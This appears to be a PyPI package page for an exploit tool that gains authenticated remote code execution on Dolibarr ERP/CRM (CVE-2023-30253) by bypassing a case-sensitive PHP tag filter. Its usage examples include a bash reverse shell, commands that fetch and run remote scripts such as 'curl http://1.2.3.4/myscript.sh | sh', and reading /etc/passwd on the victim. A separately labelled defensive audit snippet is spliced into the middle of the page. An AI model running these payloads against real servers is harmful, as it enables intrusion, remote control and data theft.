An authenticated RCE exploit for Dolibarr ERP/CRM CVE-2023-30253.
DolibabyPhp
Installation
You can either install the package from the PyPI repository with `pip` or `git clone` the source directly from GitHub.

```bash
pip install dolibabyphp
```
Usage
```text
Usage: dolibabyphp [OPTIONS] TARGET_URL USERNAME PASSWORD COMMAND [ARGS]...

  This exploit will log into the Dolibarr web server at the specified target URL
  with the provided username and password. After that it will attempt to create
  a web page with a unique name. Once created, it will modify the web page to
  include the custom PHP code bypassing the sanitation check by not using only
  lowercase letters (e.g. PHP or pHp instead of php). There are multiple
  payloads to choose from After the payload has finished running, the web page
  will be deleted.

Options:
  --site-name TEXT       Specify a name to use when creating a site on the
                         target. Defaults to UUIDv4.
  --page-name TEXT       Specify a name to use when creating a page on the
                         target. Defaults to UUIDv4.
  --page-title TEXT      Specify a title for the page. Defaults to the page
                         name.
  --proxy TEXT           Specify a proxy URL for use in all requests.
  -o, --output FILENAME  Specify a file path to output the results of the
                         payload to. Defaults to stdout.
  -h, --help             Show this message and exit.

Commands:
  bash-reverse-shell     Spawns a bash shell on the victim machine and...
  cleanup                Runs the cleanup script on the target for given site...
  curl-pipe              Curl a file and pipe it to another command.
  custom-php-payload     Specify your own PHP payload to be run on the victim...
  custom-system-payload  Specify your own payload to be run via PHP system()...
  sftp                   SFTPs to the attacker machine, downloads the...
  wget                   Downloads the file at the specified URL to to the...
```
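The help text above describes a sanitation check that only recognises the all-lowercase spelling of the PHP open tag. As an added example (not code from the DolibabyPhp project or from Dolibarr), the following Python sketch models such a literal check next to a case-insensitive one and audits stored page bodies for tags the literal check would miss; the function names and the sample pages are assumptions constructed for illustration.

```python
import re

# PHP accepts its "<?php" open tag in any letter case, so a filter has to as well.
PHP_OPEN_TAG = re.compile(r"<\?php", re.IGNORECASE)


def lowercase_only_check(content: str) -> bool:
    """Model of the flawed filter the page describes: literal, case-sensitive match."""
    return "<?php" in content


def case_insensitive_check(content: str) -> bool:
    """Hardened check: match the open tag regardless of letter case."""
    return PHP_OPEN_TAG.search(content) is not None


def audit_pages(pages: dict[str, str]) -> dict[str, str]:
    """Classify each stored page body.

    'clean'   - no PHP open tag in any spelling
    'blocked' - tag present and also seen by the lowercase-only check
    'bypass'  - tag present but invisible to the lowercase-only check
    """
    verdicts = {}
    for name, body in pages.items():
        if not case_insensitive_check(body):
            verdicts[name] = "clean"
        elif lowercase_only_check(body):
            verdicts[name] = "blocked"
        else:
            verdicts[name] = "bypass"
    return verdicts


# Constructed sample page bodies (inert placeholders, not taken from the tool).
SAMPLE_PAGES = {
    "about.html": "<h1>About us</h1><?xml version='1.0'?>",
    "lower.html": "<p>x</p><?php /* placeholder */ ?>",
    "upper.html": "<p>x</p><?PHP /* placeholder */ ?>",
    "mixed.html": "<p>x</p><?pHp /* placeholder */ ?>",
}

if __name__ == "__main__":
    for page, verdict in audit_pages(SAMPLE_PAGES).items():
        print(f"{verdict:8} {page}")
```

Pages reported as `bypass` are the ones worth reviewing on an instance where website page content is editable by authenticated users.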
Examples
Here are some examples of how to use the CLI.
```bash
# Reverse shell with Bash.
dolibabyphp http://example.com/ username1 pass_word23 bash-reverse-shell --lhost 1.2.3.4 --lport 4444

# Custom payload with a proxy.
dolibabyphp --proxy http://127.0.0.1:8080 http://example.com/ username1 pass_word23 custom-system-payload --payload "uname -a"

# SFTP and execute payload with output written to a file.
dolibabyphp -o ./linpeas-output.txt http://example.com/ username1 pass_word23 sftp --private-key-file ./id_ed25519 sftp://me@1.2.3.4:2222/linpeas.sh ./style.css

# Curl payload and pipe it to sh.
dolibabyphp -o ./linpeas-output.txt http://example.com/ username1 pass_word23 curl-pipe https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
```
From Python
If you want to integrate this exploit into another Python project, you can just import it.
```python
from time import sleep

from dolibabyphp import Exploit, furl, php_system, open_file, cleanup_site

exploit = Exploit(
    target_url=furl('http://example.com'),
    username="username1",
    password="pass_word23",
)

# You can get the result of the payload directly from the exploit.
result = exploit.run(php_system('cat /etc/passwd'))
users = list(map(lambda acct: acct.split(':')[0], result.output.split('\n')))

# If cleanup fails, we can just try again.
while not result.cleaned_up:
    sleep(30)  # wait a bit before trying cleanup again
    result.cleanup()

# You can also have it write the result to a file.
with open_file('./exploit-output.txt', 'w', lazy=True) as file:
    # You can reuse the same Exploit instance.
    exploit.output = file
    # The site_name and page_name do not change automatically.
    result = exploit.run(php_system('curl http://1.2.3.4/myscript.sh | sh'))
```
Running from source
In order to run the project from the source code, you can either use `rye run` or make sure you add the `src/` directory to the `PYTHONPATH` and then import the module `dolibabyphp` with the `-m` flag.

```bash
# With rye
rye run dolibabyphp

# Without rye
PYTHONPATH="$(pwd)/src/" python -m dolibabyphp
```
File details
Details for the file dolibabyphp-1.2.0.tar.gz.
File metadata
- Download URL: dolibabyphp-1.2.0.tar.gz
- Upload date:
- Size: 23.8 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.12.3
File hashes
Algorithm | Hash digest
---|---
SHA256 | 033a5769f668ffa999010772fe7e1b1ad6fd3b8b35a915040dbd79fda1b3dcad
MD5 | 616062187f5357ac18f23b53c872b6ab
BLAKE2b-256 | 649e3bf41978694c0aca4a86464ac586a8b4475dea6119283fd249094415af7e
File details
Details for the file dolibabyphp-1.2.0-py3-none-any.whl.
File metadata
- Download URL: dolibabyphp-1.2.0-py3-none-any.whl
- Upload date:
- Size: 14.8 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.12.3
File hashes
Algorithm | Hash digest
---|---
SHA256 | 344a24ad15794d94fb95dcf9d01c62c68911f2f7ade9946b0519da7db7cc86d8
MD5 | 159c8c47a940779a2c2ae975c223c65e
BLAKE2b-256 | 6de2df658f07b43021c7a410e961fb48e2b4841627d4e3d2ef71239ac842b051